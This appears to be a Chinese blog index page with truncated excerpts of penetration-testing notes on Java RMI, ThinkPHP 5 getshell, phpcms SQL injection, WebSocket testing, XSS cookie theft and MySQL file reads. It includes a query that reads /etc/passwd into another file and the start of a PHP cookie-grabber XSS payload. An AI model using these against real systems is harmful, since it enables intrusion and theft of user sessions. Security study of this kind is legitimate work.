- 博客(9)
- 收藏
- 关注
原创 Java 1099端口RMI exploit
https://null-byte.wonderhowto.com/how-to/exploit-java-remote-method-invocation-get-root-0187685/https://hackerone.com/reports/163547https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere...
2018-12-25 11:23:58 3098
原创 websocke渗透测试WSSiP: A WebSocket Manipulation Proxy
碰到一个websocket的测试,而burp没有很好的支持websocket的repeater功能。于是找到一个websocket测试工具:WSSiP: A WebSocket Manipulation Proxyhttps://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/may/wssip-a-websoc...
2018-12-18 14:26:11 1463
转载 npm设置代理
https://stackoverflow.com/questions/33162560/error-tunneling-socket-while-executing-npm-install>npm config set proxy http://proxyhost:proxyport>npm config set https-proxy http://proxyhost:prox...
2018-12-18 11:38:18 2456
原创 THINKPHP5 getshell
参考:https://mp.weixin.qq.com/s/oWzDIIjJS2cwjb4rzOM4DQhttps://www.anquanke.com/post/id/167653http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23及v5.1.31以下版本)_远程命令执行漏洞利用(getshell)/...
2018-12-11 17:33:56 7914
原创 phpcms_v9.6.0的SQL注入
参考:https://zhuanlan.zhihu.com/p/26263513安装phpcms所有版本安装:http://download.phpcms.cn步骤先拿到cookie将这个cookie值作为userid_flash的值并带上src参数的值为urlencoded的SQL注入payload。这里的payload为:得到wknv_att_json的值,并作为...
2018-12-06 10:48:13 6231 3
原创 XSS拿Cookie
payload:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS injection#exploit-code-or-pocXSS/grabber.php<?php// How to use itecho "<script>new Image().src=\&
2018-12-03 11:36:33 926
转载 mysql读/写文件操作
找到sql注入的时候,想要读文件,发现mysql> select load_file("/etc/passwd") into outfile "/tmp/passwd";ERROR 1290 (HY000): The MySQL server is running with the --sec
2018-12-01 13:34:22 11719
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人